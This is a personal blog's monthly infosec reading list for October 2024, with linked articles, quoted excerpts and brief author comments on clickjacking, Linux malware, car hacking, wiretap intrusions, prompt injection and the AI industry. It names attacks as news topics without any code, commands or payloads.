Infosec Reading List - October 2024
On a monthly basis I will publish my reading recommendations which mainly focus on Information Security (InfoSec) and Outdoor Sports. All InfoSec Reading Lists can be found here. Text in italic represent quotes from the original article.
Quotes from the Twitterverse
N/A
InfoSec
- Comedian John Mulaney brutally roasts SF techies at Dreamforce - The comedian rounded out his Dreamforce appearance by thanking attendees “for the world you’re creating for my son … where he will never talk to an actual human again. Instead, a little cartoon Einstein will pop up and give him a sort of good answer and probably refer him to another chatbot.” - “We’re just two guys hitting Wiffle balls badly and yelling ‘Good job’ at each other,” he said. “It’s sort of the same energy here at Dreamforce.” - [link]
- Using YouTube to steal your files - And there we go, a one-click clickjacking attack that chains a Google Slides YouTube embed path traversal to three separate redirects to gain editor access on a Drive file/folder! - [link]
- perfctl: A Stealthy Malware Targeting Millions of Linux Servers - [link]
- Cloudflare blocks largest recorded DDoS attack peaking at 3.8Tbps - [link]
- Hacking Kia: Remotely Controlling Cars With Just a License Plate - The above four HTTP requests could be used to send commands to pretty much any Kia vehicle made after 2013 (see “Vehicles Affected” table for specifics) using only the license plate. - [link]
- Microsoft’s largest ever security transformation detailed in new report - [link]
- U.S. Wiretap Systems Targeted in China-Linked Hack - A cyberattack tied to the Chinese government penetrated the networks of a swath of U.S. broadband providers, potentially accessing information from systems the federal government uses for court-authorized network wiretapping requests. - these privileged accounts are dangerous and should be strictly controlled. It also shows: backdoors will be used, either through the intended party or another one - A person familiar with the attack said the U.S. government considered the intrusions to be historically significant and worrisome. - [link]
- LLMs don’t do formal reasoning - and that is a HUGE problem - “we found no evidence of formal reasoning in language models …. Their behavior is better explained by sophisticated pattern matching—so fragile, in fact, that changing names can alter results by ~10%!” - [link]
- Engaging with Boards to improve the management of cyber security risk - [pdf] - Remember, it’s your job to advise; you can’t set the appetite for risk. That has to be done by the Board. - this guide does contain a lot of solid, baseline advise - [link]
- When it comes to security, LLMs are like Swiss cheese — and that’s going to cause huge problems - [link]
- OpenAI Is A Bad Business - yet the company says that it expects to make $11.6 billion in 2025 and $100 billion by 2029, a statement so egregious that I am surprised it’s not some kind of financial crime to say it out loud. - an interesting article that raises a lot of important and critical questions, e.g. If OpenAI — the most prominent name in all of generative AI — is only making a billion dollars a year from this, what does that say about the larger growth trajectory of this company, or actual usage of generative AI products? - And, if we’re honest, it still isn’t obvious why anyone should use ChatGPT in the first place, other than the fact everybody is talking about it. You can ask it to generate something — a picture, a few paragraphs, perhaps a question — and at that point say “cool” and move on. - Perhaps it’s the hallucination problem, or perhaps it’s just that generative AI isn’t something that produces particularly-interesting interactions with a user. While you could argue that “somebody can work out a really cool product,” it’s time to ask why Amazon, Google, Meta, OpenAI, Apple, and Microsoft have failed to make one in the last two years. - [link]
- Thinking Like an AI - [link]
- Large language models and data protection - [link]
- Microsoft Copilot: From Prompt Injection to Exfiltration of Personal Information - [link]
- Location tracking of phones is out of control. Here’s how to fight back. - [link]
- OpenAI, Google and Anthropic are struggling to build more advanced AI - The companies are facing several challenges. It’s become increasingly difficult to find new, untapped sources of high-quality, human-made training data that can be used to build more advanced AI systems. - [link]
- iPhones Seized by Cops Are Rebooting, and No One’s Sure Why - “If the iPhone was in the After First Unlock (AFU) state, the device returns to a Before First Unlock (BFU) state after the reboot. This can be very detrimental to the acquisition of digital evidence from devices that are not supported in any state outside of AFU.” - [link]
Outdoor
N/A
This post is licensed under
CC BY 4.0
by the author.